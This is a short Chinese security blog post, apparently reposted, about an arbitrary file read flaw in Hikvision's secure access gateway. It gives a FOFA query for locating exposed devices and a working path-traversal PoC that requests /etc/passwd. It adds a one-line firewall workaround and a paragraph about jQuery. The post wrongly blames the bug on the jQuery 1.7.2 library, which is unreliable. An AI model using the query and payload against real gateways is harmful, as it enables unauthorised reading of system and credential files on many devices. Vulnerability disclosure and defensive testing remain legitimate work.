通杀?海康威视安全接入网关任意文件读取漏洞
2023-12-25 16:55:35 Author: 瓜神学习网络安全(查看原文) 阅读量:23 收藏

使

   
背景
海康威视安全接入网关使用jquery-1.7.2JavaScript代码库(框架)jQuery 1.7.2版本存在任意文件读取漏洞。
jquery-1.7.2
FOFA:
body="webui/js/jquerylib/jquery-1.7.2.min.js"

POC:


/webui/?file_name=../../../../../etc/passwd&g=sys_dia_data_down
除此之外,像安博通深度安全网关等使用jquery-1.7.2 JavaScript代码库(框架)的设备同样存在此漏洞

修复

临时修复:在防火墙中添加../../参数及相关变形的过滤规则。

goby&nuclei检测

公众号回jquery-1.7.2”获取,供运维人员用于检测。

最后附百度百科:

jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(框架)于2006年1月由John Resig发布。jQuery设计的宗旨是“write Less,Do More”,即倡导写更少的代码,做更多的事情。它封装JavaScript常用的功能代码,提供一种简便的JavaScript设计模式,优化HTML文档操作、事件处理、动画设计和Ajax交互。

jQuery的核心特性可以总结为:具有独特的链式语法和短小清晰的多功能接口;具有高效灵活的CSS选择器,并且可对CSS选择器进行扩展;拥有便捷的插件扩展机制和丰富的插件。jQuery兼容各种主流浏览器,如IE 6.0+、FF 1.5+、Safari 2.0+、Opera 9.0+等。 [1]


文章来源: http://mp.weixin.qq.com/s?__biz=MzkwODE4ODUzMg==&mid=2247486637&idx=1&sn=5295a2eace4f7e11470b2f2b738948a9&chksm=c1141af695e3b40458f47c9588694ff8919dc95a6e67922ff64599655589c64f4da10632c1c6&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh